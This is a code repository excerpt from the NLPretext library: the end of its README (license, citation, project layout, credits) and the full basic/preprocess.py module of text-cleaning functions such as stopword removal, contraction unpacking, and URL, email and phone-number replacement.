254 | [](https://github.com/artefactory/NLPretext/blob/main/LICENSE)
255 |
256 | This project is licensed under the terms of the `Apache Software License 2.0` license. See [LICENSE](https://github.com/artefactory/NLPretext/blob/main/LICENSE) for more details.

## 📃 Citation
257 |
258 | ```
259 | @misc{nlpretext,
260 | author = {artefactory},
261 | title = {All the goto functions you need to handle NLP use-cases, integrated in NLPretext},
262 | year = {2021},
263 | publisher = {GitHub},
264 | journal = {GitHub repository},
265 |   howpublished = {\url{https://github.com/artefactory/NLPretext}}
266 | }
267 | ```
268 |
269 |
270 | # Project Organization
271 |
272 |
273 | .
274 | ├── .github/workflows <- Where the CI and CD lives
275 | ├── datasets/external <- Bash scripts to download external datasets
276 | ├── docker <- All you need to build a Docker image from that package
277 | ├── docs <- Sphinx HTML documentation
278 | ├── nlpretext <- Main Package. This is where the code lives
279 | │ ├── preprocessor.py <- Main preprocessing script
280 |     │   ├── textloader.py          <- Main text loading script
281 | │ ├── augmentation <- Text augmentation script
282 | │ ├── basic <- Basic text preprocessing
283 | │ ├── cli <- Command lines that can be used
284 | │ ├── social <- Social text preprocessing
285 | │ ├── token <- Token text preprocessing
287 | │ ├── _config <- Where the configuration and constants live
288 |     │   └── _utils                 <- Where preprocessing utils scripts live
289 | ├── references <- assets
290 |     ├── tests                      <- Where the tests live
291 | ├── .gitignore
292 | ├── .pre-commit-config.yaml <- Pre-commit configuration
293 | ├── CODE_OF_CONDUCT.md <- Code of conduct guidelines
294 | ├── CONTRIBUTING.md <- Contribution guidelines
295 | ├── LICENSE
296 | ├── Makefile
297 | ├── pyproject.toml <- Package build configuration
298 | ├── README.md <- The top-level README for developers using this project.
299 | └── SECURITY.md
300 |
301 | # Credits
302 |
303 | - [textacy](https://github.com/chartbeat-labs/textacy) for the following basic preprocessing functions:
304 | - `fix_bad_unicode`
305 | - `normalize_whitespace`
306 | - `unpack_english_contractions`
307 | - `replace_urls`
308 | - `replace_emails`
309 | - `replace_numbers`
310 | - `replace_currency_symbols`
311 | - `remove_punct`
312 | - `remove_accents`
313 | - `replace_phone_numbers` *(with some modifications of our own)*
314 |
--------------------------------------------------------------------------------
/nlpretext/basic/preprocess.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 |
16 |
17 | from typing import List, Optional
18 |
19 | import re
20 | import unicodedata
21 |
22 | from flashtext import KeywordProcessor
23 | from ftfy import fix_text as _fix_text
24 | from nlpretext._config import constants
25 | from nlpretext._utils.phone_number import extract_phone_numbers as _extract_phone_numbers
26 | from nlpretext._utils.stopwords import get_stopwords
27 | from nlpretext.token.tokenizer import tokenize
28 |
29 |
30 | def normalize_whitespace(text: str) -> str:
31 | """
32 | ----
33 | Copyright 2016 Chartbeat, Inc.
34 | Code from textacy: https://github.com/chartbeat-labs/textacy
35 | ----
36 |
37 | Given ``text`` str, replace one or more spacings with a single space, and
38 | one or more linebreaks with a single newline. Also strip leading/trailing
39 | whitespace.
40 | eg. " foo bar " -> "foo bar"
41 |
42 | Parameters
43 | ----------
44 | text : string
45 |
46 | Returns
47 | -------
48 | string
49 | """
50 | text = constants.NONBREAKING_SPACE_REGEX.sub(
51 | " ", constants.LINEBREAK_REGEX.sub(r"\n", text)
52 | ).strip()
53 | return text
54 |
55 |
56 | def remove_whitespace(text: str) -> str:
57 | """
58 | Given ``text`` str, remove one or more spacings and linebreaks.
59 | Also strip leading/trailing whitespace.
60 | eg. " foo bar " -> "foobar".
61 |
62 | Parameters
63 | ----------
64 | text : string
65 |
66 | Returns
67 | -------
68 | string
69 | """
70 | return constants.NONBREAKING_SPACE_REGEX.sub(
71 | "", constants.LINEBREAK_REGEX.sub("", text)
72 | ).strip()
73 |
74 |
75 | def lower_text(text: str) -> str:
76 | """
77 | Given ``text`` str, transform it into lowercase.
78 |
79 | Parameters
80 | ----------
81 | text : string
82 |
83 | Returns
84 | -------
85 | string
86 | """
87 | return text.lower()
88 |
89 |
90 | def filter_groups(token: str, ignored_stopwords: Optional[List[str]] = None) -> str:
91 | """
92 | Given ``token`` str and a list of groups of words
93 | that were concatenated into tokens, reverses the tokens
94 | to their ungrouped state.
95 |
96 | Parameters
97 | ----------
98 | token : string
99 | ignored_stopwords : list of strings
100 |
101 | Returns
102 | -------
103 | string
104 | """
105 | if ignored_stopwords:
106 | for group in ignored_stopwords:
107 | if token == remove_whitespace(group):
108 | token = group
109 | return token
110 |
111 |
112 | def ungroup_ignored_stopwords(
113 | tokens: List[str], ignored_stopwords: Optional[List[str]] = None
114 | ) -> List[str]:
115 | """
116 | Given ``tokens`` list of str and a list of groups of words
117 | that are concatenated in tokens, reverses the tokens to
118 | their ungrouped state.
119 |
120 | Parameters
121 | ----------
122 | tokens : list of strings
123 | ignored_stopwords : list of strings
124 |
125 | Returns
126 | -------
127 | list of strings
128 | """
129 | return [filter_groups(token, ignored_stopwords) for token in tokens]
130 |
131 |
132 | def remove_stopwords(
133 | text: str,
134 | lang: str,
135 | custom_stopwords: Optional[List[str]] = None,
136 | ignored_stopwords: Optional[List[str]] = None,
137 | ) -> str:
138 | """
139 | Given ``text`` str, remove classic stopwords for a given language and
140 | custom stopwords given as a list. Words and groups of words from
141 | ignored_stopwords list are ignored during stopwords removal.
142 |
143 | Parameters
144 | ----------
145 | text : string
146 | lang : string
147 | custom_stopwords : list of strings
148 | ignored_stopwords : list of strings
149 |
150 | Returns
151 | -------
152 | string
153 |
154 | Raises
155 | ------
156 | ValueError
157 | if ``custom_stopwords`` and ``ignored_stopwords`` have common elements.
158 | """
159 | if custom_stopwords and ignored_stopwords:
160 | common_elements = set(custom_stopwords).intersection(set(ignored_stopwords))
161 | if common_elements != set():
162 | raise ValueError(
163 | f"Found common words in custom_stopwords and ignored_stopwords: \
164 | {common_elements}. Please remove duplicated values."
165 | )
166 | stopwords = get_stopwords(lang)
167 | if ignored_stopwords:
168 | keyword_processor = KeywordProcessor()
169 | singletons_to_keep = [x for x in ignored_stopwords if len(x.split()) == 1]
170 | for group_of_words in ignored_stopwords:
171 | keyword_processor.add_keyword(group_of_words, remove_whitespace(group_of_words))
172 | text = keyword_processor.replace_keywords(text)
173 | else:
174 | singletons_to_keep = []
175 | if custom_stopwords:
176 | stopwords += custom_stopwords
177 | if not text:
178 | raise ValueError("Found empty text. Please fix it before using this function.")
179 | if lang in ["fr", "en"]:
180 | lang_module = {"fr": "fr_spacy", "en": "en_spacy"}[lang]
181 | tokens = tokenize(text, lang_module)
182 | else:
183 | tokens = text.split()
184 | tokens = [t for t in tokens if (t not in stopwords or t in singletons_to_keep)]
185 | tokens = ungroup_ignored_stopwords(tokens, ignored_stopwords)
186 | return " ".join(tokens)
187 |
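# Illustrative usage sketch (an assumption for documentation, not library code;
# exact output depends on the stopword list for the chosen language):
#   remove_stopwords("he failed because of the rain", "en")
#   -> e.g. "failed rain"
#   remove_stopwords("he failed because of the rain", "en", ignored_stopwords=["because of"])
#   -> e.g. "failed because of rain"  (the protected group survives as a whole)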
188 |
189 | def remove_eol_characters(text: str) -> str:
190 | r"""
191 | Remove end of line (\n) char.
192 |
193 | Parameters
194 | ----------
195 | text : str
196 |
197 | Returns
198 | -------
199 | str
200 | """
201 | text = text.replace("\n", " ")
202 | return text
203 |
204 |
205 | def fix_bad_unicode(text: str, normalization: str = "NFC") -> str:
206 | """
207 | ----
208 | Copyright 2016 Chartbeat, Inc.
209 | Code from textacy: https://github.com/chartbeat-labs/textacy
210 | ----
211 |
212 |     Fix unicode text that's "broken" using `ftfy
213 |     <https://ftfy.readthedocs.io>`_;
214 | this includes mojibake, HTML entities and other code cruft,
215 | and non-standard forms for display purposes.
216 |
217 | Parameters
218 | ----------
219 | text : string
220 |
221 | normalization ({'NFC', 'NFKC', 'NFD', 'NFKD'}):
222 | if 'NFC', combines characters and diacritics written using separate
223 | code points, e.g. converting "e" plus an acute accent modifier into
224 | "é"; unicode
225 | can be converted to NFC form without any change in its meaning!
226 | if 'NFKC', additional normalizations are applied that can change
227 | the meanings of characters, e.g. ellipsis characters will be replaced
228 | with three periods
229 |
230 | Returns
231 | -------
232 | string
233 | """
234 | text = _fix_text(text, normalization=normalization)
235 | return text
236 |
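# Illustrative usage sketch (an assumption for documentation, not library code):
#   fix_bad_unicode("âœ” No problems")          -> "✔ No problems"  (mojibake repaired)
#   fix_bad_unicode("…", normalization="NFKC")  -> "..."            (ellipsis expanded)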
237 |
238 | def unpack_english_contractions(text: str) -> str:
239 | """
240 | ----
241 | Copyright 2016 Chartbeat, Inc.
242 | Code from textacy: https://github.com/chartbeat-labs/textacy
243 | ----
244 |
245 | Replace *English* contractions in ``text`` str with their unshortened
246 | forms.
247 | N.B. The "'d" and "'s" forms are ambiguous (had/would, is/has/possessive),
248 | so are left as-is.
249 | eg. "You're fired. She's nice." -> "You are fired. She's nice."
250 |
251 | Parameters
252 | ----------
253 | text : string
254 |
255 | Returns
256 | -------
257 | string
258 | """
259 | # standard
260 | text = constants.CONTRACTION_NT_NOT.sub(
261 | r"\1\2 not",
262 | text,
263 | )
264 | text = constants.CONTRACTION_LL_WILL.sub(
265 | r"\1\2 will",
266 | text,
267 | )
268 | text = constants.CONTRACTION_RE_ARE.sub(r"\1\2 are", text)
269 | text = constants.CONTRACTION_VE_HAVE.sub(
270 | r"\1\2 have",
271 | text,
272 | )
273 | text = constants.CONTRACTION_CANT_CANNOT.sub(r"\1\2n not", text)
274 | text = constants.CONTRACTION_M_AM.sub(r"\1\2 am", text)
275 | text = constants.CONTRACTION_LET_LETUS.sub(r"\1\2 us", text)
276 | text = constants.CONTRACTION_WONT_WILLNOT.sub(r"\1\2ill not", text)
277 | text = constants.CONTRACTION_SHANT_SHALLNOT.sub(r"\1\2hall not", text)
278 | text = constants.CONTRACTION_YALL_YOUALL.sub(r"\1\2ou all", text)
279 | return text
280 |
281 |
282 | def replace_urls(text: str, replace_with: str = "*URL*") -> str:
283 | """
284 | ----
285 | Copyright 2016 Chartbeat, Inc.
286 | Code from textacy: https://github.com/chartbeat-labs/textacy
287 | ----
288 |
289 | Replace all URLs in ``text`` str with ``replace_with`` str.
290 |
291 | Parameters
292 | ----------
293 | text : string
294 | replace_with : string
295 | the string you want the URL to be replaced with.
296 |
297 | Returns
298 | -------
299 | string
300 | """
301 | text = constants.URL_REGEX.sub(replace_with, constants.SHORT_URL_REGEX.sub(replace_with, text))
302 | return text
303 |
304 |
305 | def replace_emails(text: str, replace_with: str = "*EMAIL*") -> str:
306 | """
307 | ----
308 | Copyright 2016 Chartbeat, Inc.
309 | Code from textacy: https://github.com/chartbeat-labs/textacy
310 | ----
311 |
312 | Replace all emails in ``text`` str with ``replace_with`` str
313 |
314 | Parameters
315 | ----------
316 | text : string
317 | replace_with : string
318 | the string you want the email address to be replaced with.
319 |
320 | Returns
321 | -------
322 | string
323 | """
324 | text = constants.EMAIL_REGEX.sub(replace_with, text)
325 | return text
326 |
327 |
328 | def replace_phone_numbers(
329 | text: str,
330 | country_to_detect: List[Optional[str]],
331 | replace_with: str = "*PHONE*",
332 | method: str = "regex",
333 | ) -> str:
334 | """
335 | ----
336 | Copyright 2016 Chartbeat, Inc.
337 | Inspired code from textacy: https://github.com/chartbeat-labs/textacy
338 | ----
339 |
340 | Replace all phone numbers in ``text`` str with ``replace_with`` str
341 |
342 | Parameters
343 | ----------
344 | text : string
345 | replace_with : string
346 | the string you want the phone number to be replaced with.
347 | method : ['regex','detection']
348 |         regex is faster but will miss many numbers, while detection will
349 |         catch every number, but takes a while.
350 |     country_to_detect : list
351 |         If a list of country codes is specified, every number formatted
352 |         for those countries will be caught.
353 |         Only used when method = 'detection'.
354 |
355 | Returns
356 | -------
357 | string
358 | """
359 | if method == "regex":
360 | text = constants.PHONE_REGEX.sub(replace_with, text)
361 | elif method == "detection":
362 | found_nums = _extract_phone_numbers(text, countrylist=country_to_detect)
363 |
364 |         # sort by length so longer numbers are replaced first, avoiding partial replacements of truncated numbers
365 | found_nums.sort(key=len, reverse=True)
366 | for phone_number in found_nums:
367 | text = text.replace(phone_number, replace_with)
368 | else:
369 | raise ValueError(
370 |             'Please input a valid method: either "regex" or \
371 |             "detection"'
372 | )
373 | return text
374 |
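# Illustrative usage sketch (an assumption for documentation, not library code):
#   replace_phone_numbers("Call 0606060606", country_to_detect=["FR"], method="detection")
#   -> e.g. "Call *PHONE*"
# "regex" is a fast pattern match; "detection" parses candidate numbers per
# country code and is more exhaustive but slower.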
375 |
376 | def replace_numbers(text: str, replace_with: str = "*NUMBER*") -> str:
377 | """
378 | ----
379 | Copyright 2016 Chartbeat, Inc.
380 | Code from textacy: https://github.com/chartbeat-labs/textacy
381 | ----
382 |
383 | Replace all numbers in ``text`` str with ``replace_with`` str.
384 |
385 | Parameters
386 | ----------
387 | text : string
388 | replace_with : string
389 | the string you want the number to be replaced with.
390 |
391 | Returns
392 | -------
393 | string
394 | """
395 | text = constants.NUMBERS_REGEX.sub(replace_with, text)
396 | return text
397 |
398 |
399 | def replace_currency_symbols(text: str, replace_with: Optional[str] = None) -> str:
400 | """
401 | ----
402 | Copyright 2016 Chartbeat, Inc.
403 | Code from textacy: https://github.com/chartbeat-labs/textacy
404 | ----
405 |
406 | Replace all currency symbols in ``text`` str with string specified by
407 | ``replace_with`` str.
408 |
409 | Parameters
410 | ----------
411 | text : str
412 | raw text
413 | replace_with : None or string
414 | if None (default), replace symbols with
415 | their standard 3-letter abbreviations (e.g. '$' with 'USD', '£'
416 | with 'GBP'); otherwise, pass in a string with which to replace all
417 | symbols (e.g. "*CURRENCY*")
418 |
419 | Returns
420 | -------
421 | string
422 | """
423 | if replace_with is None:
424 | for k, v in constants.CURRENCIES.items():
425 | text = text.replace(k, v)
426 | else:
427 | text = constants.CURRENCY_REGEX.sub(replace_with, text)
428 | return text
429 |
430 |
431 | def remove_punct(text: str, marks: Optional[str] = None) -> str:
432 | """
433 | Remove punctuation from ``text`` by replacing all instances of ``marks``
434 | with whitespace.
435 |
436 | Parameters
437 | ----------
438 | text : str
439 | raw text
440 |
441 | marks : str or None
442 | If specified, remove only the characters in this string,
443 | e.g. ``marks=',;:'`` removes commas, semi-colons, and colons.
444 | Otherwise, all punctuation marks are removed.
445 |
446 | Returns
447 | -------
448 | string
449 |
450 | Note
451 | -------
452 | When ``marks=None``, Python's built-in :meth:`str.translate()` is
453 | used to remove punctuation; otherwise, a regular expression is used
454 | instead. The former's performance is about 5-10x faster.
455 | """
456 | if marks:
457 | text = re.sub(f"[{re.escape(marks)}]+", " ", text, flags=re.UNICODE)
458 | else:
459 | text = text.translate(constants.PUNCT_TRANSLATE_UNICODE)
460 | return text
461 |
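# Illustrative usage sketch (an assumption for documentation, not library code):
#   remove_punct("Hello, world!")             -> "Hello  world "   (all marks removed)
#   remove_punct("Hello, world!", marks=",;") -> "Hello  world!"   (only , and ; removed)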
462 |
463 | def remove_accents(text: str, method: str = "unicode") -> str:
464 | """
465 | Remove accents from any accented unicode characters in ``text`` str,
466 | either by transforming them into ascii equivalents or removing them
467 | entirely.
468 |
469 | Parameters
470 | ----------
471 | text : str
472 | raw text
473 |
474 | method : ({'unicode', 'ascii'})
475 | if 'unicode', remove accented
476 | char for any unicode symbol with a direct ASCII equivalent; if 'ascii',
477 | remove accented char for any unicode symbol
478 |
479 |     NB: the 'ascii' method is notably faster than 'unicode', but less thorough
480 |
481 | Returns
482 | -------
483 | string
484 |
485 | Raises
486 | ------
487 | ValueError
488 | if ``method`` is not in {'unicode', 'ascii'}
489 | """
490 | if method == "unicode":
491 | text = "".join(
492 | c for c in unicodedata.normalize("NFKD", text) if not unicodedata.combining(c)
493 | )
494 | elif method == "ascii":
495 | text = unicodedata.normalize("NFKD", text).encode("ascii", errors="ignore").decode("ascii")
496 | else:
497 |         msg = f'`method` must be either "unicode" or "ascii", not {method}'
498 | raise ValueError(msg)
499 | return text
500 |
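# Illustrative usage sketch (an assumption for documentation, not library code):
#   remove_accents("déjà vu")                 -> "deja vu"
#   remove_accents("déjà vu", method="ascii") -> "deja vu"   (faster, but lossier)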
501 |
502 | def remove_multiple_spaces_and_strip_text(text: str) -> str:
503 | """
504 | Remove multiple spaces, strip text, and remove '-', '*' characters.
505 |
506 | Parameters
507 | ----------
508 | text : str
509 | the text to be processed
510 |
511 | Returns
512 | -------
513 | string
514 | the text with removed multiple spaces and strip text
515 | """
516 | regex_remove_multiple_spaces_list = ["\\t", "[\\s\\-\\*]{2,}"]
517 | for regex_remove_multiple_spaces in regex_remove_multiple_spaces_list:
518 | text = re.sub(regex_remove_multiple_spaces, " ", text)
519 | text = text.strip()
520 | return text
521 |
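# Illustrative usage sketch (an assumption for documentation, not library code):
#   remove_multiple_spaces_and_strip_text("  hello   -- world * ")
#   -> e.g. "hello world"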
522 |
523 | def filter_non_latin_characters(text: str) -> str:
524 | """
525 | Function that filters non latin characters of a text.
526 |
527 | Parameters
528 | ----------
529 | text : string
530 |
531 | Returns
532 | -------
533 | string
534 | """
535 | text = constants.LATIN_CHARACTERS_RE.sub(" ", text)
536 | text = normalize_whitespace(text)
537 | return text
538 |
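# Illustrative usage sketch (an assumption for documentation, not library code):
#   filter_non_latin_characters("こんにちは hello")
#   -> e.g. "hello"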
--------------------------------------------------------------------------------